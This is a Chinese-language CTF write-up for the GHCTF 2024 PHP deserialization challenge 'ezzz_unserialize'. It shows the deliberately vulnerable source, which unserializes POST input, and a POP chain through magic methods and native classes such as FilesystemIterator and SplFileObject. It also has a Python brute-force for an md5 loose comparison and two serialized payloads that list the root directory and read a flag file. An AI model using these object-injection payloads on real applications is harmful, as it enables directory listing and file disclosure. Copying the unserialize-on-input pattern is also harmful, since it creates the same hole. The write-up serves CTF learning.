[GHCTF 2024 新生赛]ezzz_unserialize
源码:
<?php
/*** @Author: hey* @message: Patience is the key in life,I think you'll be able to find vulnerabilities in code audits.* Have fun and Good luck!!!*/
error_reporting(0);
class Sakura{public $apple;public $strawberry;public function __construct($a){$this -> apple = $a;}function __destruct(){echo $this -> apple;}public function __toString(){$new = $this -> strawberry;return $new();}}class NoNo {private $peach;public function __construct($string) {$this -> peach = $string;}public function __get($name) {$var = $this -> $name;$var[$name]();}
}class BasaraKing{public $orange;public $cherry;public $arg1;public function __call($arg1,$arg2){$function = $this -> orange;return $function();}public function __get($arg1){$this -> cherry -> ll2('b2');}}class UkyoTachibana{public $banana;public $mangosteen;public function __toString(){$long = @$this -> banana -> add();return $long;}public function __set($arg1,$arg2){if($this -> mangosteen -> tt2){echo "Sakura was the best!!!";}}
}class E{public $e;public function __get($arg1){array_walk($this, function ($Monday, $Tuesday) {$Wednesday = new $Tuesday($Monday);foreach($Wednesday as $Thursday){echo ($Thursday.'<br>');}});}
}class UesugiErii{protected $coconut;protected function addMe() {return "My time with Sakura was my happiest time".$this -> coconut;}public function __call($func, $args) {call_user_func([$this, $func."Me"], $args);}
}
class Heraclqs{public $grape;public $blueberry;public function __invoke(){if(md5(md5($this -> blueberry)) == 123) {return $this -> grape -> hey;}}
}class MaiSakatoku{public $Carambola;private $Kiwifruit;public function __set($name, $value){$this -> $name = $value;if ($this -> Kiwifruit = "Sakura"){strtolower($this-> Carambola);}}
}if(isset($_POST['GHCTF'])) {unserialize($_POST['GHCTF']);
} else {highlight_file(__FILE__);
}array_walk函数
array_walk() 函数对数组中的每个元素应用用户自定义函数。
原生类的利用
一.可遍历目录类
DirectoryIterator
FilesystemIterator
GlobIterator 与上面略不同,该类可以通过模式匹配来寻找文件路径。
二.可读取文件类
SplFileObject 在此函数中,URL 可作为文件名,不过也要受到allow_url_fopen影响。
二.文件系统相关扩展
finfo 该类的构造函数finfo::__construct — 别名 finfo_open(),也可以读取文件。
pop链
E::__get -> Heraclqs::__invoke -> Sakura::__toString -> Sakura::__destruct
Heraclqs::__invoke中有一个弱比较
public function __invoke(){if(md5(md5($this -> blueberry)) == 123) {return $this -> grape -> hey;}}
爆破以下即可
import hashlib
import itertools
import stringfor i in itertools.product(string.printable, repeat=3):s = ''.join(i)s1 = hashlib.md5(s.encode()).hexdigest()s2 = hashlib.md5(s1.encode()).hexdigest()if s2[:3] == '123':print(s)playload1:
<?php
class Sakura{public $apple;public $strawberry;// function __destruct()// {// echo $this -> apple;// }// public function __toString()// {// $new = $this -> strawberry;// return $new();// }
}class E{public $e;// public function __get($arg1){// array_walk($this, function ($Monday, $Tuesday) {// $Wednesday = new $Tuesday($Monday);// foreach($Wednesday as $Thursday){// echo ($Thursday.'<br>');// }// });// }
}class Heraclqs{public $grape;public $blueberry;// public function __invoke(){// if(md5(md5($this -> blueberry)) == 123) {// return $this -> grape -> hey;// }// }
}$a1=new E;
$a1->FilesystemIterator='/';$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;$a3=new Sakura;
$a3->strawberry=$a2;$a4=new Sakura;
$a4->apple=$a3;$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:18:"FilesystemIterator";s:1:"/";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}
palyload2:
<?php
class Sakura{public $apple;public $strawberry;// function __destruct()// {// echo $this -> apple;// }// public function __toString()// {// $new = $this -> strawberry;// return $new();// }
}class E{public $e;// public function __get($arg1){// array_walk($this, function ($Monday, $Tuesday) {// $Wednesday = new $Tuesday($Monday);// foreach($Wednesday as $Thursday){// echo ($Thursday.'<br>');// }// });// }
}class Heraclqs{public $grape;public $blueberry;// public function __invoke(){// if(md5(md5($this -> blueberry)) == 123) {// return $this -> grape -> hey;// }// }
}$a1=new E;
$a1->SplFileObject='/1_ffffffflllllagggggg';$a2=new Heraclqs;
$a2->blueberry='LLh';
$a2->grape=$a1;$a3=new Sakura;
$a3->strawberry=$a2;$a4=new Sakura;
$a4->apple=$a3;$s=serialize($a4);
echo $s;
?>
//O:6:"Sakura":2:{s:5:"apple";O:6:"Sakura":2:{s:5:"apple";N;s:10:"strawberry";O:8:"Heraclqs":2:{s:5:"grape";O:1:"E":2:{s:1:"e";N;s:13:"SplFileObject";s:22:"/1_ffffffflllllagggggg";}s:9:"blueberry";s:3:"LLh";}}s:10:"strawberry";N;}
